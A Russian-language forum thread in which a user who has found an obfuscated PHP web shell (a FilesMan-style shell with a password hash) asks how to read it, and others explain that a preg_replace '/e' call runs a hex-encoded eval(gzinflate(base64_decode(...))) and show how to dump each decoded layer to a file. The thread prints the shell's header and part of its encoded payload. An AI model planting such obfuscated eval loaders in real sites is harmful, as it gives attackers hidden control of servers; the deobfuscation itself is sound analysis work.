найден "шелл" Код (Text): <?php $auth_pass = "434990c8a25d2be94863561ae98bd682"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x6 4\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQnxYY4cezEebFTvyRp4tx0gQW2Xli6u5i4qb/7PTN6WWlfME57ru t+fk/OacJKo9FIGo1Go9HIG5bX3cksvi6Xuqf7J+/3Tz7bL8/O3nXP4av79MX+0Zn9pVJh39YY/CnNIzd8OnKnccTazAlD57psvQiCk e9aVWad+vNwhj/enh49C2L85TldJ+yPvSs3xM/fnOnA/Yq/TpxJz4fEyjZh9oblWeiOuhMn7o/L9qbNasybzPxg4Jbtv+2qXnUF8ux NDxNXoBn/jF1n4IZlgtps1OrsQf0BOwpidhDMpwNb0IB/3K9ezL9u1m7W1na9qdeN3Lhsu2EYhF0/GNnVo/M3b6BIkgepXcqP7Gr dyJk4X7vuV7c/j71g2o29iSsgIJc+u7438eKySps4I6/f/XMexG7UDedThO и еще 5 страниц такого :) вопрос, привести это дело к удобочитаемому виду реально? это обфсускачено или Zend?
Так а что там дальше-то? Желательно, без ненужного. То есть от кавычек открывающих до кавычек закрывающих можно не выводить.
примерно так: Код (Text): <?php $auth_pass = "434990c8a25d2be94863561ae98bd682"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx ..................... мильен символов DJjyttlnSELWEZJakW9R3f7+J+uYuFiiC318gZ9P8C'\x29\x29\x29\x3B",".");?> если надо я пришлю файлик...
Модификатор "е", а это значит, что кракозябра будет интерпретирована как php код. Добавлено спустя 1 минут 0 секунд: Код (PHP): eval(gzinflate(base64_decode(....))); для фана: Код (PHP): print(chr(hexdec("65"))); // \x65 print(chr(hexdec("76"))); // \x76 print(chr(hexdec("61"))); // \x61 print(chr(hexdec("6C"))); // \x6c
Код (PHP): preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28' // заменить на preg_replace("/.*/e","\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x27\x6a\x71\x5f\x66\x75\x6c\x6c\x2e\x70\x68\x70\x27\x2c\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28' после запуска скрипта будет создан файлик jq_full.php ЗЫ: код внутри - ужасен...
Спасибо! работает, но только с тем файликом..... есть еще один делаю как ты описал, он преобразовывается...но внутри есть еще такая же бяка....а вот она уже никак не хочет ((( помоги пожалуйста.... (
Там все тоже самое, только автор сей чудо-срипта решил пару раз поизвращаться с одним и темже файлом. 1. делаешь как я говорил. получаешь jq_full.php (переименуй) 2. в переименованном делаешь всё тоже самое, и получаешь новый jq_full.php и т.п. пока тебе не надоест =-)
так вот один раз прокатывает, а второй нет ((( Добавлено спустя 9 минут 32 секунды: Все, спасибо, разобрался )))